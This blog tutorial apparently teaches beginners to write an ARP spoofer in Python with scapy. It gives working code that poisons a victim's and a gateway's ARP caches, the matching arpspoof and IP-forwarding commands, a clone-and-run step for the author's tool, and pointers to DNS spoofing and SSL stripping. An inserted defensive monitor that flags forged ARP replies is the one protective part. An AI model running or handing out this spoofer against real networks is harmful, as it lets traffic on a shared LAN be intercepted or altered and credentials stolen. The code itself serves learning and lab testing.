Write your own ARP Spoofer program in Python : Coding for Cyber Security (Program №2)

Anandita
3 min read · Oct 30, 2020

As a beginner in coding, this was the second program that I had written after understanding the basic concepts of programming. I have explained some of them in a brief manner.

What does an ARP spoofer do?

The Address Resolution Protocol (ARP) maps a dynamic IP address to a permanent machine address (MAC address). Attackers take advantage of this protocol by sending fake ARP messages to a target machine on a Local Area Network. ARP replies are not authenticated, so the target accepts them, and the attacker's MAC address gets mapped to the IP of a legitimate computer or server on the same network. This lets the attacker intercept or modify data in transit.

We will write a program to fool the victim machine so that it thinks we are the gateway. Similarly, we will make the gateway think that we hold the victim's IP.
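The defender's view of the exchange described above, as an added example that is not part of the original article: a monitor that parses raw ARP payloads and flags a reply nobody asked for and an IP whose MAC suddenly changes. The `ArpMonitor` class, the helper names and the sample addresses (192.0.2.0/24, locally administered MACs) are constructed for illustration.

```python
import socket
import struct

ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa

def build_arp(op, sha, spa, tha, tpa):  # packs constructed sample data only
    sha, tha = (bytes.fromhex(m.replace(":", "")) for m in (sha, tha))
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op, sha,
                       socket.inet_aton(spa), tha, socket.inet_aton(tpa))

def parse_arp(payload):
    """Return (op, sender_mac, sender_ip, target_ip), or None if not Ethernet/IPv4 ARP."""
    if len(payload) < 28:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _, tpa = struct.unpack(ARP_FMT, payload[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, sha.hex(":"), socket.inet_ntoa(spa), socket.inet_ntoa(tpa)

class ArpMonitor:
    """Keeps first-seen IP-to-MAC bindings and flags two spoofing signals."""
    def __init__(self):
        self.bindings = {}    # ip -> first MAC seen claiming it
        self.pending = set()  # IPs that a who-has request (op=1) asked about
    def observe(self, payload):
        parsed = parse_arp(payload)
        if parsed is None:
            return []
        op, mac, ip, target_ip = parsed
        alerts = []
        if op == 1:
            self.pending.add(target_ip)
        elif op == 2:
            if ip not in self.pending:  # an is-at reply that answers no request
                alerts.append(f"unsolicited reply: {ip} is-at {mac}")
            self.pending.discard(ip)
        known = self.bindings.setdefault(ip, mac)  # later claims never overwrite
        if known != mac:
            alerts.append(f"binding change: {ip} was {known}, now claimed by {mac}")
        return alerts

def demo():
    gw, victim, rogue = "02:00:00:00:00:01", "02:00:00:00:00:10", "02:00:00:00:00:66"
    frames = [  # constructed sample traffic
        build_arp(1, victim, "192.0.2.10", "00:00:00:00:00:00", "192.0.2.1"),
        build_arp(2, gw, "192.0.2.1", victim, "192.0.2.10"),     # genuine reply
        build_arp(2, rogue, "192.0.2.1", victim, "192.0.2.10"),  # forged reply
    ]
    monitor = ArpMonitor()
    return [monitor.observe(f) for f in frames]
```

A monitor like this only sees replies addressed to its own host or mirrored to it. Pinning the gateway's MAC as a static ARP entry is the complementary mitigation.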

Step 1 : To do this, we import the scapy module, which is used throughout the program. Scapy is a very useful Python module for working with network packets.

import scapy.all as scapy
import time

Step 2 : Defining a function for spoofing :

def spoof(targ, spoof):
    # Build an ARP reply (op=2) addressed to targ, with the IP in `spoof` as the sender IP
    packet = scapy.ARP(op=2, pdst=targ, hwdst=mac(targ), psrc=spoof)
    scapy.send(packet, verbose=False)

Step 3 : Let the user enter the target and gateway addresses.

target_ip = input("[*] Enter Target IP > ")  # Enter your target IP
gateway_ip = input("[*] Enter Gateway IP > ")  # Enter your gateway's IP

Step 4 : Now, to get the MAC address of the target machine, we define the following function :

def mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    br = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_req_br = br / arp_request
    # Creating a list
    list_1 = scapy.srp(arp_req_br, timeout=5, verbose=False)[0]
    return list_1[0][1].hwsrc

Step 5 : Printing the results :

countpackets = 0
while True:
    spoof(target_ip, gateway_ip)
    spoof(gateway_ip, target_ip)
    countpackets = countpackets + 2
    print("\r[*] Packets Sent " + str(countpackets), end="")
    time.sleep(2)  # Waits for two seconds

Step 6 : When the user presses Ctrl + C, we want to print the following message and then stop the program, so we wrap the loop in a try/except block.

try:
    countpackets = 0
    while True:
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        countpackets = countpackets + 2
        print("\r[*] Packets Sent " + str(countpackets), end="")
        time.sleep(2)  # Waits for two seconds
except KeyboardInterrupt:
    print("\nCtrl + C pressed…………. Quitting. ")
    reset(gateway_ip, target_ip)
    reset(target_ip, gateway_ip)
    print("[*] Arp Spoof Stopped, IP restored. ")

Step 7 : Finally, we reset the victim and gateway IPs to their original MAC addresses.

def reset(dest_ip, src_ip):
    dest_mac = mac(dest_ip)
    source_mac = mac(src_ip)
    # Send a reply carrying the real MAC of src_ip so the ARP entry is corrected
    packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=src_ip, hwsrc=source_mac)
    scapy.send(packet, verbose=False)

After performing all the above steps, our code will look something like this :

Congratulations! We are done with the coding part.

1. Arpspoof is also a built-in tool in Kali. You can run "apt-get install dsniff" to download it. The following are the commands to run arpspoof :

# echo 1 > /proc/sys/net/ipv4/ip_forward

We run the above command to forward the traffic.

# arpspoof -i <interface> -t <victim ip> <gateway ip>
# arpspoof -i <interface> -t <gateway ip> <victim ip>

After performing ARP spoofing on the target, we can perform other Man-in-the-Middle attacks, namely DNS spoofing, SSL stripping and many more.

2. You can also use my GitHub code to perform ARP spoofing or to check how the above code works. Run the following commands :

# echo 1 > /proc/sys/net/ipv4/ip_forward
# apt-get install python3 python3-scapy
# git clone https://github.com/An4ndita/ARP-Spoofer.git
# cd ARP-Spoofer
# python3 arp.py

You can find the victim’s IP address by running the following command :

# netdiscover -i <interface>

or you can also use my GitHub code elaborated in the previous article : https://github.com/An4ndita/Network-Scanner.git

and the gateway address by running :

# route -n

Thank you! Hope that you find it useful! 😊 👍
